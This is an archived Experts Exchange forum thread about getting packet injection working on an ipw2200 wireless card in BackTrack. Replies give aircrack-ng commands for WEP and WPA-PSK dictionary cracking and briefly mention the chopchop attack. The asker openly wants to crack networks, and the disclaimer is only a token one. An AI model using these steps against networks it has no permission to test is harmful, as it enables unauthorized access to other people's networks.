Solved

Ipw2200 injection problem

Posted on 2009-04-02
4
1,220 Views
Last Modified: 2013-11-09
i cannot inject packets in backtrack 3,aircrack-ng,aireplay-ng using my laptop's wireless NIC ipw2200b/g.i have tried following tutorials but nothing work.plz help!!!
0
Comment
Question by:byront93
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 3
4 Comments
 
LVL 7

Accepted Solution

by:
computerfixins earned 125 total points
ID: 24049447
Are you using the ipwraw driver?

ie:
#modprobe -r iwl3945 (replace with your driver)
#modprobe ipwraw

some cards are not capable of injection...

tutorial i had posted once upon a time, gives the general idea...
http://forums.extremeoverclocking.com/showthread.php?t=307813
0
 

Author Closing Comment

by:byront93
ID: 31565721
Thanks, now i can finally crack WEP :-). Any way to crack WPA know??? :-P
0
 
LVL 7

Expert Comment

by:computerfixins
ID: 24053150
Remember its not "cracking" its testing wep. :)

Disclaimer:  All instructions are intended for security auditing or educational purposes only!!  Should never be used for cracking a network you do not have permission to test. (I got banned from yahoo groups for a post similar to this; why I use google now:)

WPA psk (typically wrongly known as tkip) is somewhat crackable with dictionary / brute force.  Like any brute force, if there using a English word, it will only take minutes.  Otherwise...  You need to generate a rainbow table, etc, etc...  

WPA AES is completely untouchable at this point...

Basically same idea, authenticate with base station / access point:

Then

download a word list
http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/ 

generate word list
# zcat all.gz | egrep -v '^#' > dictionary

Start aircrack
# aircrack-ng -w dictonary -0 wpaout.cap

Opening wpaout.cap
Read 15683 packets.

   #  BSSID              ESSID                     Encryption

   1  00:A1:B0:30:5C:84  HOGE                      WPA (1 handshake)

Index number of target network ? 1


0
 
LVL 7

Expert Comment

by:computerfixins
ID: 24053559
Also chop, chop attack...  which is fairly useless...  more of a proof of concept.

First needs to be PSK / TKIP, QOS needs to be on, then you can run chop chop...  

All you can do is inject arp packets, syns, dns, other small stuff...  
0

Featured Post

Why Off-Site Backups Are The Only Way To Go

You are probably backing up your data—but how and where? Ransomware is on the rise and there are variants that specifically target backups. Read on to discover why off-site is the way to go.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Every server (virtual or physical) needs a console: and the console can be provided through hardware directly connected, software for remote connections, local connections, through a KVM, etc. This document explains the different types of consol…
Using in-flight Wi-Fi when you travel? Business travelers beware! In-flight Wi-Fi networks could rip the door right off your digital privacy portal. That’s no joke either, as it might also provide a convenient entrance for bad threat actors.
Viewers will learn how to connect to a wireless network using the network security key. They will also learn how to access the IP address and DNS server for connections that must be done manually. After setting up a router, find the network security…
If you're a developer or IT admin, you’re probably tasked with managing multiple websites, servers, applications, and levels of security on a daily basis. While this can be extremely time consuming, it can also be frustrating when systems aren't wor…

687 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question